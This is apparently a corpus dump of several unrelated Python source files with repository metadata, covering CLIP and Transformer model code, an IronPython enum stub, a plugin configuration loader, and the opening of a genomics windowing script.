embed_dim_to_check=x.shape[-1],
num_heads=self.num_heads,
q_proj_weight=self.q_proj.weight,
k_proj_weight=self.k_proj.weight,
v_proj_weight=self.v_proj.weight,
in_proj_weight=None,
in_proj_bias=torch.cat([self.q_proj.bias, self.k_proj.bias, self.v_proj.bias]),
bias_k=None,
bias_v=None,
add_zero_attn=False,
dropout_p=0,
out_proj_weight=self.c_proj.weight,
out_proj_bias=self.c_proj.bias,
use_separate_proj_weight=True,
training=self.training,
need_weights=False
)
return x[0]
class ModifiedResNet(nn.Module):
def __init__(self, layers, output_dim, heads, input_resolution=224, width=64, adapter_config=None):
super().__init__()
self.output_dim = output_dim
self.input_resolution = input_resolution
self.adapter_config = adapter_config
self.conv1 = nn.Conv2d(3, width // 2, kernel_size=3, stride=2, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(width // 2)
self.conv2 = nn.Conv2d(width // 2, width // 2, kernel_size=3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(width // 2)
self.conv3 = nn.Conv2d(width // 2, width, kernel_size=3, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(width)
self.avgpool = nn.AvgPool2d(2)
self.relu = nn.ReLU(inplace=True)
self._inplanes = width
self.layer1 = self._make_layer(width, layers[0])
self.layer2 = self._make_layer(width * 2, layers[1], stride=2)
self.layer3 = self._make_layer(width * 4, layers[2], stride=2)
self.layer4 = self._make_layer(width * 8, layers[3], stride=2)
embed_dim = width * 32
self.attnpool = AttentionPool2d(input_resolution // 32, embed_dim, heads, output_dim)
def _make_layer(self, planes, blocks, stride=1):
layers = [Bottleneck(self._inplanes, planes, stride, adapter_config=self.adapter_config)]
self._inplanes = planes * Bottleneck.expansion
for _ in range(1, blocks):
layers.append(Bottleneck(self._inplanes, planes, adapter_config=self.adapter_config))
return nn.Sequential(*layers)
def forward(self, x, skip_last_layer=False):
def stem(x):
for conv, bn in [(self.conv1, self.bn1), (self.conv2, self.bn2), (self.conv3, self.bn3)]:
x = self.relu(bn(conv(x)))
x = self.avgpool(x)
return x
x = x.type(self.conv1.weight.dtype)
x = stem(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
if not skip_last_layer:
x = self.attnpool(x)
return x
class LayerNorm(nn.LayerNorm):
def forward(self, x: torch.Tensor):
orig_type = x.dtype
ret = super().forward(x.type(torch.float32))
return ret.type(orig_type)
class QuickGELU(nn.Module):
def forward(self, x: torch.Tensor):
return x * torch.sigmoid(1.702 * x)
class ResidualAttentionBlock(nn.Module):
def __init__(self, d_model: int, n_head: int, attn_mask: torch.Tensor = None):
super().__init__()
self.attn = nn.MultiheadAttention(d_model, n_head)
self.ln_1 = LayerNorm(d_model)
self.mlp = nn.Sequential(OrderedDict([
("c_fc", nn.Linear(d_model, d_model * 4)),
("gelu", QuickGELU()),
("c_proj", nn.Linear(d_model * 4, d_model))
]))
self.ln_2 = LayerNorm(d_model)
self.attn_mask = attn_mask
def attention(self, x: torch.Tensor, text_mask=None):
if text_mask is None:
text_mask = self.attn_mask.to(dtype=x.dtype, device=x.device) if self.attn_mask is not None else None
return self.attn(x, x, x, need_weights=False, attn_mask=text_mask)[0]
def forward(self, x: torch.Tensor, text_mask = None):
x = x + self.attention(self.ln_1(x), text_mask = text_mask)
x = x + self.mlp(self.ln_2(x))
return x
class Transformer(nn.Module):
def __init__(self, width: int, layers: int, heads: int, attn_mask: torch.Tensor = None):
super().__init__()
self.width = width
self.layers = layers
self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)])
def forward(self, x: torch.Tensor, text_mask=None):
for layer in self.resblocks:
x = layer(x, text_mask = text_mask)
return x
class VisualTransformer(nn.Module):
def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int, output_dim: int):
super().__init__()
self.input_resolution = input_resolution
self.output_dim = output_dim
self.heads = heads
self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, bias=False)
scale = width ** -0.5
self.class_embedding = nn.Parameter(scale * torch.randn(width))
self.positional_embedding = nn.Parameter(scale * torch.randn((input_resolution // patch_size) ** 2 + 1, width))
self.ln_pre = LayerNorm(width)
self.transformer = Transformer(width, layers, heads)
self.ln_post = LayerNorm(width)
self.proj = nn.Parameter(scale * torch.randn(width, output_dim))
def forward(self, x: torch.Tensor, skip_last_layer=False, text_embedding=None, text_mask=None):
x = self.conv1(x)
x = x.reshape(x.shape[0], x.shape[1], -1)
x = x.permute(0, 2, 1)
x = torch.cat([self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1)
x = x + self.positional_embedding.to(x.dtype)
x = self.ln_pre(x)
x = x.permute(1, 0, 2)
if text_embedding is not None:
text_embedding = text_embedding.transpose(0, 1)
joint_embeddings = torch.cat((text_embedding, x), dim=0)
text_mask = torch.cat(
(text_mask, torch.zeros(x.size(1), x.size(0)).float().to(x.device)),
dim=1)
text_mask = torch.cat([text_mask for i in range(self.heads)], dim=0)
text_mask = text_mask.unsqueeze(1).expand(text_mask.size(0), text_mask.size(1), text_mask.size(1))
x = self.transformer(joint_embeddings, text_mask=text_mask)
x = self.transformer(x)
x = x.permute(1, 0, 2)
if skip_last_layer:
x = self.ln_post(x)
else:
x = x @ self.proj
return x
class CLIP(nn.Module):
def __init__(self,
embed_dim: int,
image_resolution: int,
vision_layers: Union[Tuple[int, int, int, int], int],
vision_width: int,
vision_patch_size: int,
context_length: int,
vocab_size: int,
transformer_width: int,
transformer_heads: int,
transformer_layers: int,
adapter_config,
):
super().__init__()
self.context_length = context_length
if isinstance(vision_layers, (tuple, list)):
vision_heads = vision_width * 32 // 64
self.visual = ModifiedResNet(
layers=vision_layers,
output_dim=embed_dim,
heads=vision_heads,
input_resolution=image_resolution,
width=vision_width,
adapter_config=adapter_config,
)
else:
vision_heads = vision_width // 64
self.visual = VisualTransformer(
input_resolution=image_resolution,
patch_size=vision_patch_size,
width=vision_width,
layers=vision_layers,
heads=vision_heads,
output_dim=embed_dim
)
self.transformer = Transformer(
width=transformer_width,
layers=transformer_layers,
heads=transformer_heads,
attn_mask=self.build_attention_mask()
)
self.vocab_size = vocab_size
self.token_embedding = nn.Embedding(vocab_size, transformer_width)
self.positional_embedding = nn.Parameter(torch.empty(self.context_length, transformer_width))
self.ln_final = LayerNorm(transformer_width)
self.text_projection = nn.Parameter(torch.empty(transformer_width, embed_dim))
self.logit_scale = nn.Parameter(torch.ones([]))
self.initialize_parameters()
def initialize_parameters(self):
nn.init.normal_(self.token_embedding.weight, std=0.02)
nn.init.normal_(self.positional_embedding, std=0.01)
if isinstance(self.visual, ModifiedResNet):
if self.visual.attnpool is not None:
std = self.visual.attnpool.c_proj.in_features ** -0.5
nn.init.normal_(self.visual.attnpool.q_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.k_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.v_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.c_proj.weight, std=std)
for resnet_block in [self.visual.layer1, self.visual.layer2, self.visual.layer3, self.visual.layer4]:
for name, param in resnet_block.named_parameters():
if name.endswith("bn3.weight"):
nn.init.zeros_(param)
proj_std = (self.transformer.width ** -0.5) * ((2 * self.transformer.layers) ** -0.5)
attn_std = self.transformer.width ** -0.5
fc_std = (2 * self.transformer.width) ** -0.5
for block in self.transformer.resblocks:
nn.init.normal_(block.attn.in_proj_weight, std=attn_std)
nn.init.normal_(block.attn.out_proj.weight, std=proj_std)
nn.init.normal_(block.mlp.c_fc.weight, std=fc_std)
nn.init.normal_(block.mlp.c_proj.weight, std=proj_std)
if self.text_projection is not None:
nn.init.normal_(self.text_projection, std=self.transformer.width ** -0.5)
def build_attention_mask(self):
mask = torch.empty(self.context_length, self.context_length)
mask.fill_(float("-inf"))
mask.triu_(1)
return mask
@property
def dtype(self):
return self.visual.conv1.weight.dtype
def encode_image(self, image):
return self.visual(image.type(self.dtype))
def encode_text(self, text):
x = self.token_embedding(text).type(self.dtype)
x = x + self.positional_embedding.type(self.dtype)
x = x.permute(1, 0, 2)
x = self.transformer(x)
x = x.permute(1, 0, 2)
x = self.ln_final(x).type(self.dtype)
x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection
return x
def forward(self, image, text):
image_features = self.encode_image(image)
text_features = self.encode_text(text)
image_features = image_features / image_features.norm(dim=-1, keepdim=True)
text_features = text_features / text_features.norm(dim=-1, keepdim=True)
logit_scale = self.logit_scale.exp()
logits_per_image = logit_scale * image_features @ text_features.t()
logits_per_text = logit_scale * text_features @ image_features.t()
return logits_per_image, logits_per_text
def convert_weights(model: nn.Module):
def _convert_weights_to_fp16(l):
if isinstance(l, (nn.Conv1d, nn.Conv2d, nn.Linear)):
l.weight.data = l.weight.data.half()
if l.bias is not None:
l.bias.data = l.bias.data.half()
if isinstance(l, nn.MultiheadAttention):
for attr in [*[f"{s}_proj_weight" for s in ["in", "q", "k", "v"]], "in_proj_bias", "bias_k", "bias_v"]:
tensor = getattr(l, attr)
if tensor is not None:
tensor.data = tensor.data.half()
for name in ["text_projection", "proj"]:
if hasattr(l, name):
attr = getattr(l, name)
if attr is not None:
attr.data = attr.data.half()
model.apply(_convert_weights_to_fp16)
def build_model(state_dict: dict, adapter_config):
vit = "visual.proj" in state_dict
if vit:
vision_width = state_dict["visual.conv1.weight"].shape[0]
vision_layers = len([k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in state_dict if k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = state_dict["text_projection"].shape[1]
context_length = state_dict["positional_embedding"].shape[0]
vocab_size = state_dict["token_embedding.weight"].shape[0]
transformer_width = state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith(f"transformer.resblocks")))
model = CLIP(
embed_dim,
image_resolution, vision_layers, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers,
adapter_config
)
for key in ["input_resolution", "context_length", "vocab_size"]:
del state_dict[key]
try:
model.load_state_dict(state_dict)
except RuntimeError as err:
print("Some keys are mismatched")
err = str(err).split("\n", 1)[1]
print(err)
model.load_state_dict(state_dict, strict=False)
return model.eval()
| true
| true
|
1c40e7ccbe64aab0ac0834414cef864c92ed5b6a
| 1,073
|
py
|
Python
|
release/stubs.min/System/Drawing/__init___parts/GraphicsUnit.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 182
|
2017-06-27T02:26:15.000Z
|
2022-03-30T18:53:43.000Z
|
release/stubs.min/System/Drawing/__init___parts/GraphicsUnit.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 28
|
2017-06-27T13:38:23.000Z
|
2022-03-15T11:19:44.000Z
|
release/stubs.min/System/Drawing/__init___parts/GraphicsUnit.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 67
|
2017-06-28T09:43:59.000Z
|
2022-03-20T21:17:10.000Z
|
class GraphicsUnit(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies the unit of measure for the given data.
enum GraphicsUnit,values: Display (1),Document (5),Inch (4),Millimeter (6),Pixel (2),Point (3),World (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Display=None
Document=None
Inch=None
Millimeter=None
Pixel=None
Point=None
value__=None
World=None
| 26.170732
| 215
| 0.661696
|
class GraphicsUnit(Enum,IComparable,IFormattable,IConvertible):
def __eq__(self,*args):
pass
def __format__(self,*args):
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Display=None
Document=None
Inch=None
Millimeter=None
Pixel=None
Point=None
value__=None
World=None
| true
| true
|
1c40e7f353d277cb2619d721b37441b276b9c6af
| 7,330
|
py
|
Python
|
lib/plugins/plugin.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 16
|
2021-08-30T07:05:28.000Z
|
2022-03-04T06:46:42.000Z
|
lib/plugins/plugin.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 7
|
2021-08-30T01:33:52.000Z
|
2022-03-23T10:19:38.000Z
|
lib/plugins/plugin.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 9
|
2021-08-29T21:49:03.000Z
|
2022-03-12T19:59:29.000Z
|
"""
MIT License
Copyright (C) 2021 ROCKY4546
https://github.com/rocky4546
This file is part of Cabernet
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
"""
import logging
import json
import importlib
import importlib.resources
import lib.common.utils as utils
import lib.common.exceptions as exceptions
from lib.config.config_defn import ConfigDefn
from lib.db.db_plugins import DBPlugins
from lib.db.db_config_defn import DBConfigDefn
PLUGIN_CONFIG_DEFN_FILE = 'config_defn.json'
PLUGIN_INSTANCE_DEFN_FILE = 'instance_defn.json'
PLUGIN_MANIFEST_FILE = 'plugin.json'
def register(func):
"""Decorator for registering a new plugin"""
Plugin._plugin_func = func
return func
class Plugin:
# Temporarily used to register the plugin setup() function
_plugin_func = None
logger = None
def __init__(self, _config_obj, _plugin_defn, _plugin_path):
if Plugin.logger is None:
Plugin.logger = logging.getLogger(__name__)
self.enabled = True
self.plugin_path = _plugin_path
self.config_obj = _config_obj
self.db_configdefn = DBConfigDefn(_config_obj.data)
self.load_config_defn()
# plugin is registered after this call, so grab reg data
self.init_func = Plugin._plugin_func
self.plugin_settings = {}
self.plugin_db = DBPlugins(_config_obj.data)
self.namespace = None
self.instances = []
self.load_plugin_manifest(_plugin_defn)
self.plugin_obj = None
if not self.config_obj.data[self.namespace.lower()]['enabled']:
self.enabled = False
self.logger.debug('Plugin disabled in config.ini for {}'.format(self.name))
return
self.load_instances()
self.logger.notice('Plugin created for {}'.format(self.name))
def load_config_defn(self):
try:
self.logger.debug(
'Plugin Config Defn file loaded at {}'.format(self.plugin_path))
defn_obj = ConfigDefn(self.plugin_path, PLUGIN_CONFIG_DEFN_FILE, self.config_obj.data)
default_config = defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(defn_obj)
for area, area_data in defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
defn_obj.terminate()
except FileNotFoundError:
self.logger.warning(
'PLUGIN CONFIG DEFN FILE NOT FOUND AT {}'.format(self.plugin_path))
def load_instances(self):
inst_defn_obj = ConfigDefn(self.plugin_path, PLUGIN_INSTANCE_DEFN_FILE, self.config_obj.data, True)
# determine in the config data whether the instance of this name exists. It would have a section name = 'name-instance'
self.instances = self.find_instances()
if len(self.instances) == 0:
self.enabled = False
self.config_obj.data[self.namespace.lower()]['enabled'] = False
self.logger.info('No instances found, disabling plugin {}'.format(self.namespace))
return
for inst in self.instances:
self.plugin_db.save_instance(self.namespace, inst, '')
# create a defn with the instance name as the section name. then process it.
inst_defn_obj.is_instance_defn = False
for area, area_data in inst_defn_obj.config_defn.items():
if len(area_data['sections']) != 1:
self.logger.error('INSTANCE MUST HAVE ONE AND ONLY ONE SECTION')
raise exceptions.CabernetException('plugin defn must have one and only one instance section')
section = list(area_data['sections'].keys())[0]
base_section = section.split('_', 1)[0]
area_data['sections'][base_section + '_' + inst] = area_data['sections'].pop(section)
if 'label' in self.config_obj.data[base_section + '_' + inst] \
and self.config_obj.data[base_section + '_' + inst]['label'] is not None:
area_data['sections'][base_section + '_' + inst]['label'] = self.config_obj.data[base_section + '_' + inst]['label']
inst_defn_obj.save_defn_to_db()
default_config = inst_defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
inst_defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(inst_defn_obj)
for area, area_data in inst_defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
def find_instances(self):
instances = []
inst_sec = self.namespace.lower() + '_'
for section in self.config_obj.data.keys():
if section.startswith(inst_sec):
instances.append(section.split(inst_sec, 1)[1])
return instances
def load_plugin_manifest(self, _plugin_defn):
self.load_default_settings(_plugin_defn)
self.import_manifest()
def load_default_settings(self, _plugin_defn):
for name, attr in _plugin_defn.items():
self.plugin_settings[name] = attr['default']
def import_manifest(self):
try:
json_settings = importlib.resources.read_text(self.plugin_path, PLUGIN_MANIFEST_FILE)
settings = json.loads(json_settings)
self.namespace = settings['name']
self.plugin_db.save_plugin(settings)
self.logger.debug(
'Plugin Manifest file loaded at {}'.format(self.plugin_path))
self.plugin_settings = utils.merge_dict(self.plugin_settings, settings, True)
except FileNotFoundError:
self.logger.warning(
'PLUGIN MANIFEST FILE NOT FOUND AT {}'.format(self.plugin_path))
@property
def name(self):
return self.plugin_settings['name']
| 43.892216
| 136
| 0.65075
|
import logging
import json
import importlib
import importlib.resources
import lib.common.utils as utils
import lib.common.exceptions as exceptions
from lib.config.config_defn import ConfigDefn
from lib.db.db_plugins import DBPlugins
from lib.db.db_config_defn import DBConfigDefn
PLUGIN_CONFIG_DEFN_FILE = 'config_defn.json'
PLUGIN_INSTANCE_DEFN_FILE = 'instance_defn.json'
PLUGIN_MANIFEST_FILE = 'plugin.json'
def register(func):
Plugin._plugin_func = func
return func
class Plugin:
_plugin_func = None
logger = None
def __init__(self, _config_obj, _plugin_defn, _plugin_path):
if Plugin.logger is None:
Plugin.logger = logging.getLogger(__name__)
self.enabled = True
self.plugin_path = _plugin_path
self.config_obj = _config_obj
self.db_configdefn = DBConfigDefn(_config_obj.data)
self.load_config_defn()
self.init_func = Plugin._plugin_func
self.plugin_settings = {}
self.plugin_db = DBPlugins(_config_obj.data)
self.namespace = None
self.instances = []
self.load_plugin_manifest(_plugin_defn)
self.plugin_obj = None
if not self.config_obj.data[self.namespace.lower()]['enabled']:
self.enabled = False
self.logger.debug('Plugin disabled in config.ini for {}'.format(self.name))
return
self.load_instances()
self.logger.notice('Plugin created for {}'.format(self.name))
def load_config_defn(self):
try:
self.logger.debug(
'Plugin Config Defn file loaded at {}'.format(self.plugin_path))
defn_obj = ConfigDefn(self.plugin_path, PLUGIN_CONFIG_DEFN_FILE, self.config_obj.data)
default_config = defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(defn_obj)
for area, area_data in defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
defn_obj.terminate()
except FileNotFoundError:
self.logger.warning(
'PLUGIN CONFIG DEFN FILE NOT FOUND AT {}'.format(self.plugin_path))
def load_instances(self):
inst_defn_obj = ConfigDefn(self.plugin_path, PLUGIN_INSTANCE_DEFN_FILE, self.config_obj.data, True)
self.instances = self.find_instances()
if len(self.instances) == 0:
self.enabled = False
self.config_obj.data[self.namespace.lower()]['enabled'] = False
self.logger.info('No instances found, disabling plugin {}'.format(self.namespace))
return
for inst in self.instances:
self.plugin_db.save_instance(self.namespace, inst, '')
inst_defn_obj.is_instance_defn = False
for area, area_data in inst_defn_obj.config_defn.items():
if len(area_data['sections']) != 1:
self.logger.error('INSTANCE MUST HAVE ONE AND ONLY ONE SECTION')
raise exceptions.CabernetException('plugin defn must have one and only one instance section')
section = list(area_data['sections'].keys())[0]
base_section = section.split('_', 1)[0]
area_data['sections'][base_section + '_' + inst] = area_data['sections'].pop(section)
if 'label' in self.config_obj.data[base_section + '_' + inst] \
and self.config_obj.data[base_section + '_' + inst]['label'] is not None:
area_data['sections'][base_section + '_' + inst]['label'] = self.config_obj.data[base_section + '_' + inst]['label']
inst_defn_obj.save_defn_to_db()
default_config = inst_defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
inst_defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(inst_defn_obj)
for area, area_data in inst_defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
def find_instances(self):
instances = []
inst_sec = self.namespace.lower() + '_'
for section in self.config_obj.data.keys():
if section.startswith(inst_sec):
instances.append(section.split(inst_sec, 1)[1])
return instances
def load_plugin_manifest(self, _plugin_defn):
self.load_default_settings(_plugin_defn)
self.import_manifest()
def load_default_settings(self, _plugin_defn):
for name, attr in _plugin_defn.items():
self.plugin_settings[name] = attr['default']
def import_manifest(self):
try:
json_settings = importlib.resources.read_text(self.plugin_path, PLUGIN_MANIFEST_FILE)
settings = json.loads(json_settings)
self.namespace = settings['name']
self.plugin_db.save_plugin(settings)
self.logger.debug(
'Plugin Manifest file loaded at {}'.format(self.plugin_path))
self.plugin_settings = utils.merge_dict(self.plugin_settings, settings, True)
except FileNotFoundError:
self.logger.warning(
'PLUGIN MANIFEST FILE NOT FOUND AT {}'.format(self.plugin_path))
@property
def name(self):
return self.plugin_settings['name']
| true
| true
|
1c40e8f255e777435d15fcc720e7c664f9f56b91
| 3,197
|
py
|
Python
|
models/seq2seq/Transformer.py
|
hyliush/deep-time-series
|
3fea4f62ea740c721c559a0d413e4b3a3e214b3e
|
[
"Apache-2.0"
] | 5
|
2022-03-19T10:32:29.000Z
|
2022-03-29T00:50:30.000Z
|
models/seq2seq/Transformer.py
|
hyliush/deep-time-series
|
3fea4f62ea740c721c559a0d413e4b3a3e214b3e
|
[
"Apache-2.0"
] | 1
|
2022-03-22T07:52:08.000Z
|
2022-03-22T07:55:28.000Z
|
models/seq2seq/Transformer.py
|
hyliush/deep-time-series
|
3fea4f62ea740c721c559a0d413e4b3a3e214b3e
|
[
"Apache-2.0"
] | 2
|
2022-03-19T21:07:39.000Z
|
2022-03-23T09:24:30.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
"""
Vanilla Transformer with O(L^2) complexity
"""
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
# Embedding
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
# Encoder
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
# Decoder
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :] # [B, L, D]
| 39.9625
| 114
| 0.558336
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :]
| true
| true
|
1c40e8f509b72527932d80c547e0cb3e0b1c1a43
| 9,242
|
py
|
Python
|
scripts/genome_wide/add_win_channels.py
|
renskir/sv-channels
|
284335dc20b775f9e90a7f77809acbb838308cd8
|
[
"Apache-2.0"
] | 24
|
2021-04-14T10:34:31.000Z
|
2022-03-21T07:18:05.000Z
|
scripts/genome_wide/add_win_channels.py
|
GooglingTheCancerGenome/CNN
|
284335dc20b775f9e90a7f77809acbb838308cd8
|
[
"Apache-2.0"
] | 49
|
2018-09-10T09:55:41.000Z
|
2020-04-15T12:44:22.000Z
|
scripts/genome_wide/add_win_channels.py
|
renskir/sv-channels
|
284335dc20b775f9e90a7f77809acbb838308cd8
|
[
"Apache-2.0"
] | 6
|
2020-06-17T11:57:38.000Z
|
2021-07-13T08:59:56.000Z
|
import argparse
import logging
from time import time
import numpy as np
import pysam
from functions import (is_left_clipped, is_right_clipped, load_windows,
save_windows)
def init_log(logfile):
FORMAT = '%(asctime)s %(message)s'
logging.basicConfig(format=FORMAT,
filename=logfile,
filemode='w',
level=logging.INFO)
def parse_args():
default_win = 25
parser = argparse.ArgumentParser(
description='Add window specific channels')
parser.add_argument('-b',
'--bam',
type=str,
default='../../data/test.bam',
help="Specify input file (BAM)")
parser.add_argument('-w',
'--win',
type=int,
default=default_win,
help="Window size")
parser.add_argument('-i',
'--input',
type=str,
default='./cnn/win' +
